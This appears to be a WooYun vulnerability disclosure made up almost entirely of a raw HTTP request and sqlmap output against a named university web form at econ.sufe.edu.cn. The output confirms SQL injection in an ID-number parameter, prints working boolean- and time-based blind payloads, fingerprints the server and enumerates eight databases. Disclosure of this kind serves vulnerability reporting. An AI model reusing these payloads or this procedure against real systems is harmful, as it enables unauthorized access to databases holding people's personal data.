WooYun.org

POST /se/shiyanban2.php HTTP/1.1
X-Forwarded-For: 8.8.8.8'
Content-Length: 327
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://econ.sufe.edu.cn:80/
Cookie: PHPSESSID=veicn0egtruldtc4bnbn97nf01
Host: econ.sufe.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
tijiao=%e6%8f%90%e4%ba%a4&dianhua=1&dizhi=1&gaokao=1&gaozhong=1&geren=1&jiangli=1&jiazhang=1&jzdianhua=1&shenfenid=&shengyuan=1&xingbie=%e5%a5%b3&xingming=1&xuehao=1&xuexi=1&youxiang=1&yuanxi=1

POST parameter 'shenfenid' is vulnerable. Do you want to keep testing the others
 (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 2152 HTTP(s)
requests:
---
Parameter: shenfenid (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tijiao=%e6%8f%90%e4%ba%a4&dianhua=1&dizhi=1&gaokao=1&gaozhong=1&ger
en=1&jiangli=1&jiazhang=1&jzdianhua=1&shenfenid=' AND 3366=3366 AND 'LxCT'='LxCT
&shengyuan=1&xingbie=%e5%a5%b3&xingming=1&xuehao=1&xuexi=1&youxiang=1&yuanxi=1
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: tijiao=%e6%8f%90%e4%ba%a4&dianhua=1&dizhi=1&gaokao=1&gaozhong=1&ger
en=1&jiangli=1&jiazhang=1&jzdianhua=1&shenfenid=' AND (SELECT * FROM (SELECT(SLE
EP(5)))UoJl) AND 'xoza'='xoza&shengyuan=1&xingbie=%e5%a5%b3&xingming=1&xuehao=1&
xuexi=1&youxiang=1&yuanxi=1
---
[17:46:42] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
[17:46:42] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.4
back-end DBMS: MySQL 5.0.12
[17:46:42] [INFO] fetching database names
[17:46:42] [INFO] fetching number of databases
[17:46:42] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[17:46:42] [INFO] retrieved: 8
[17:46:46] [INFO] retrieved: information_schema
[17:47:50] [INFO] retrieved: mysql
[17:48:12] [INFO] retrieved: performance_schema
[17:49:20] [INFO] retrieved: sakila
[17:49:41] [INFO] retrieved: shufe
[17:50:07] [INFO] retrieved: sufe
[17:50:24] [INFO] retrieved: test
[17:50:40] [INFO] retrieved: world
available databases [8]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sakila
[*] shufe
[*] sufe
[*] test
[*] world
[17:51:02] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\econ.sufe.edu.cn'
[*] shutting down at 17:51:02